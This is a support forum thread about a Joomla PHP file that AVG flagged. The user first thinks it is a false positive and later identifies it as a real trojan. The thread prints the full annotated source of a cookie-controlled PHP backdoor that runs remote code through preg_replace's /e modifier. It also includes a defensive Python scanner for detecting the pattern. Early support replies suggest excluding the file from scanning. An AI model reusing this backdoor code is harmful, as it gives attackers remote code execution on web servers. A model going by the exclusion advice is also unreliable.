PHP trojan false positive

Hi,

I recently did a complete computer scan with AVG ZEN and it found a 'trojan' in a PHP file that is part of a Joomla package I downloaded when backing up my website.  I found that after reinstating the file and renaming it (with a different extension), AVG still found a trojan.  I've isolated it to the string $_COOKIE, which appears 3 times in the file.  Changing this string to $_COOKI (i.e. removing the final E) stopped AVG misidentifying this file.

$_COOKIE is a legitimate PHP variable - why is this flagging up?

All,

It is I who should be apologising!  I've found more on this subject at
https://stackoverflow.com/questions/28461492/execute-php-code-from-cookie,
where the same PHP script is discussed.  So it seems AVG correctly identified the file as a trojan, though since I don't have a PHP interpreter on my local machine, it would probably not have done me any harm - but it might explain some odd activity on my website several months ago.
I've now deleted the file completely from my local machine and my website.

Thank you for finding this - I think we can now consider the matter closed.

Regards,
Steve

Alok and Alan - many thanks for your quick responses.  I've looked into it further - the file might actually be malware since the $_COOKIE argument of 41bjGEDj3 crops up 4 times in Google, one site being https://malwr.com/analysis/OWQ4MjNlMWQ3YmJiNGEyMGExNjY5NjgyMzE3NDMwOWU/#behavior.  The entire file listing (only 294 bytes) is:

<?php
// The class name mimics a legitimate Joomla plugin; it is only a wrapper so
// that the constructor runs when the object is created on the last line.
class PluginJoomla {
    public function __construct() {
        // The three cookie names act as the operator's key: without them the
        // script falls through to the else branch.
        $jq = @$_COOKIE['41bjGEDj3'];                 // cookie value is used as a function name below
        if ($jq) {
            $option = $jq(@$_COOKIE['41bjGEDj2']);    // $jq applied to a cookie: yields the name of the function to call
            $au = $jq(@$_COOKIE['41bjGEDj1']);        // $jq applied to a cookie: yields the replacement string
            // If $option resolves to preg_replace, the /e modifier in the pattern
            // evaluates $au as PHP code (modifier deprecated in PHP 5.5, removed in 7.0).
            $option("/438/e", $au, 438);
        } else {
            // Without the cookies the script dumps the server configuration.
            phpinfo();
            die;
        }
    }
}
$content = new PluginJoomla;

Its filename is jtpbs.php, though the other instances on Google have different 5-char filenames with a .PHP extension.  I did a grep on my site's admin, modules and component folders and can't find any call to jtpbs.php, so it seems orphaned.  As a precaution, I've hidden it on my website (by setting permissions to 0000) and allowed AVG to quarantine it on my machine.

None of the references on Google say what harm (if any) it does - but on the other hand, having hidden it on my website, the site still seems to function OK.  I'm not a PHP expert, but I imagine anyone who manages to run phpinfo() on my site would see things I would prefer they didn't!

Any comments?

Regards,
Steve
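As an added illustration (not part of this thread and not AVG's detection logic), the following Python script shows why the bare string $_COOKIE is a poor indicator and what a more specific check looks like. It flags a PHP file only when a value taken from a request superglobal (directly, or through a call made via such a value) is itself invoked as a function, or when a regex literal carrying the /e modifier is passed to preg_replace or to a variable function. The regular-expression heuristics and the three sample files are constructed for this example; the first sample is the listing above, the other two are benign uses of $_COOKIE and preg_replace that the scanner leaves alone.

```python
"""Heuristic scanner for cookie-driven PHP backdoors (constructed example)."""
import os
import re
import sys

# Assumed heuristics for this example (not any vendor's signature logic):
#  1. A variable is assigned straight from $_COOKIE / $_GET / $_POST / $_REQUEST.
#  2. Taint spreads to variables assigned from a call made *through* a tainted
#     variable, e.g. $option = $jq(...).
#  3. A tainted variable is used as a variable function: $jq(...).
#  4. A regex literal with the /e modifier is passed to preg_replace or to a
#     variable function; /e evaluated the replacement as PHP (removed in 7.0).
SOURCE_ASSIGN = re.compile(r'\$(\w+)\s*=\s*@?\$_(?:COOKIE|GET|POST|REQUEST)\s*\[')
DERIVED_ASSIGN = re.compile(r'\$(\w+)\s*=\s*@?\$(\w+)\s*\(')
VARIABLE_CALL = re.compile(r'\$(\w+)\s*\(')
REGEX_ARG = re.compile(r'(?:preg_replace|\$\w+)\s*\(\s*(["\'])(.*?)\1')


def e_modifier(literal):
    """True if a PCRE literal such as "/438/e" carries the /e modifier."""
    if len(literal) < 2:
        return False
    delim = literal[0]
    end = literal.rfind(delim)        # modifiers follow the closing delimiter
    if end <= 0:
        return False
    return 'e' in literal[end + 1:]


def tainted_variables(src):
    """Variables holding request data, propagated through calls via tainted names."""
    tainted = set(SOURCE_ASSIGN.findall(src))
    changed = True
    while changed:
        changed = False
        for dst, fn in DERIVED_ASSIGN.findall(src):
            if fn in tainted and dst not in tainted:
                tainted.add(dst)
                changed = True
    return tainted


def scan_source(src):
    """Return human-readable reasons; an empty list means nothing suspicious."""
    reasons = []
    called = set(VARIABLE_CALL.findall(src))
    for name in sorted(tainted_variables(src) & called):
        reasons.append(f"request-controlled variable ${name} is invoked as a function")
    for _quote, literal in REGEX_ARG.findall(src):
        if e_modifier(literal):
            reasons.append(f"regex literal {literal!r} uses the /e (eval) modifier")
    return reasons


def scan_files(files):
    """files: {path: source}. Returns {path: reasons} for flagged files only."""
    flagged = {}
    for path, src in files.items():
        reasons = scan_source(src)
        if reasons:
            flagged[path] = reasons
    return flagged


def scan_tree(root):
    """Read every *.php file under root and scan it."""
    files = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    files[path] = fh.read()
    return scan_files(files)


# Constructed samples: the first is the listing from this thread, the other two
# are benign files written for this example.
SAMPLES = {
    "jtpbs.php": r"""<?php
class PluginJoomla {
 public function __construct() {
  $jq = @$_COOKIE['41bjGEDj3'];
  if ($jq) {
   $option = $jq(@$_COOKIE['41bjGEDj2']);
   $au=$jq(@$_COOKIE['41bjGEDj1']);
   $option("/438/e",$au,438);
  } else {
   phpinfo();die;
  }
 }
}
$content = new PluginJoomla;
""",
    "lang.php": r"""<?php
$lang = isset($_COOKIE['lang']) ? $_COOKIE['lang'] : 'en';
$name = $_COOKIE['name'];
echo htmlspecialchars($lang) . ' ' . htmlspecialchars($name);
""",
    "whitespace.php": r"""<?php
$clean = preg_replace('/\s+/', ' ', $_GET['q']);
echo htmlspecialchars($clean);
""",
}

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, reasons in scan_tree(root).items():
        print(path)
        for reason in reasons:
            print("  -", reason)
```

Run as `python scan.py /path/to/joomla` to walk a site tree; on the embedded samples only jtpbs.php is reported, with three reasons (the cookie-derived $jq and $option are called as functions, and the "/438/e" literal carries the /e modifier), while lang.php, which reads $_COOKIE twice, and whitespace.php, which calls preg_replace without /e, produce nothing. The point is that the indicator is control flow (request data becoming a callable), not the presence of the superglobal.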

Hello Steve,
I'm sorry to hear about this. You can add the PHP file to the AVG exception list (open AVG protection > menu > settings > general > exception). I also request you to submit a false positive sample here (https://secure.avg.com/submit-sample). If the issue still persists, please share a screenshot of the AVG detection page so we can assist you better. You can check the following link for instructions on taking the screenshot (http://support.avg.com/SupportArticleView?urlname=How-to-create-a-screenshot).
Best regards,
Alok.

Steve,

Sorry for the inconvenience this may have caused you. To analyze the exact issue, we need to collect some files to resolve it. Please follow these steps to send us diagnostic information from your computer. This information will allow us to analyze the situation and provide you with a solution:

Click the link http://www.avg.com/filedir/util/AVG_SysInfo.exe to download the AVG SysInfo tool.
Run the downloaded tool.
Click Continue to agree with AVG's license agreement and privacy policy. AVG SysInfo will now gather the necessary data.
Once the diagnostic output is ready, you may add comments, or click Attach file or Screenshot to provide us with additional information.
Fill in your email address.
Fill in the case # which is 04919509 by copying and pasting it from this email.
Click Send output.
Reply to the email and let us know that the data has been successfully sent. Please do not modify the email subject.
As soon as we receive the data, we will analyze the files and provide you with further information.

Steve, If applicable… For your info, just in case you are unaware, you can post the screenshot here in your topic. Click on 'Answer' & then click on the 'Image' [mountain symbol] & follow the instructions.
AVG Guru

You're welcome Steve,
I'm glad to hear that you have fixed the issue. Feel free to contact us again if you need any further assistance.
Best regards,
Alok.
